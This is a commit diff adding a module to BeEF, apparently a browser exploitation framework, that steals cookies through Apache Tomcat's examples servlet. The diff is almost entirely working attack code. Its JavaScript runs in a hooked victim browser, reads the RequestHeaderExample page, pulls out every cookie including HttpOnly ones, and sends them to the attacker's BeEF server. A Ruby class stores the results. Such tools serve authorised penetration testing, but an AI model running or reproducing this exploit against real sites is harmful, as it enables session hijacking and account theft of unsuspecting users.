Modules: Add apache_tomcat_examples_cookie_disclosure module

2021-11-09 05:36:33 +00:00
parent 9cef23be22
commit c8595b09b7
3 changed files with 87 additions and 0 deletions
--- a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js
+++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/command.js
@@ -0,0 +1,53 @@
+//
+// Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  request_header_servlet_path = "<%= @request_header_servlet_path %>";
+
+  function parseResponse() {
+    var cookie_dict = {};
+
+    if (xhr.readyState == 4) {
+      if (xhr.status == 404) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] RequestHeaderExample not found");
+        return;
+      }
+
+      if (xhr.status != 200) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] Unexpected HTTP response status " + xhr.status)
+        return;
+      }
+
+      if (!xhr.responseText) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] No response content")
+        return;
+      }
+
+      beef.debug("[apache_tomcat_examples_cookie_disclosure] Received HTML content (" + xhr.responseText.length + " bytes)");
+
+      var content = xhr.responseText.replace(/\r|\n/g,'').match(/<table.*?>(.+)<\/table>/)[0];
+
+      if (!content || !content.length) {
+        beef.debug("[apache_tomcat_examples_cookie_disclosure] Unexpected response: No HTML table in response")
+        return;
+      }
+
+      var cookies = content.match(/cookie<\/td><td>(.+)<\/td>?/)[1].split('; ');
+      for (var i=0; i<cookies.length; i++) {
+        var s_c = cookies[i].split('=', 2);
+        cookie_dict[s_c[0]] = s_c[1];
+      }
+      var result = JSON.stringify(cookie_dict);
+
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, "cookies=" + result);
+    }
+  }
+		
+  var xhr = new XMLHttpRequest();
+  xhr.onreadystatechange = parseResponse;
+  xhr.open("GET", request_header_servlet_path, true);
+  xhr.send();
+});
--- a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml
+++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+      apache_tomcat_examples_cookie_disclosure:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Apache Tomcat RequestHeaderExample Cookie Disclosure"
+            description: "This module uses the Apache Tomcat examples web app (if installed) in order to read the victim's cookies, even if issued with the HttpOnly attribute."
+            authors: ["bcoles"]
+            target:
+                working: ["All"]
--- a/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb
+++ b/modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb
@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_tomcat_examples_cookie_disclosure < BeEF::Core::Command
+
+  def self.options
+    [
+      {'name' => 'request_header_servlet_path', 'ui_label' => "'Request Header Example' path", 'value' => '/examples/servlets/servlet/RequestHeaderExample'},
+    ]
+  end
+
+	def post_execute
+		content = {}
+		content['cookies'] = @datastore['cookies']
+		save content
+	end
+end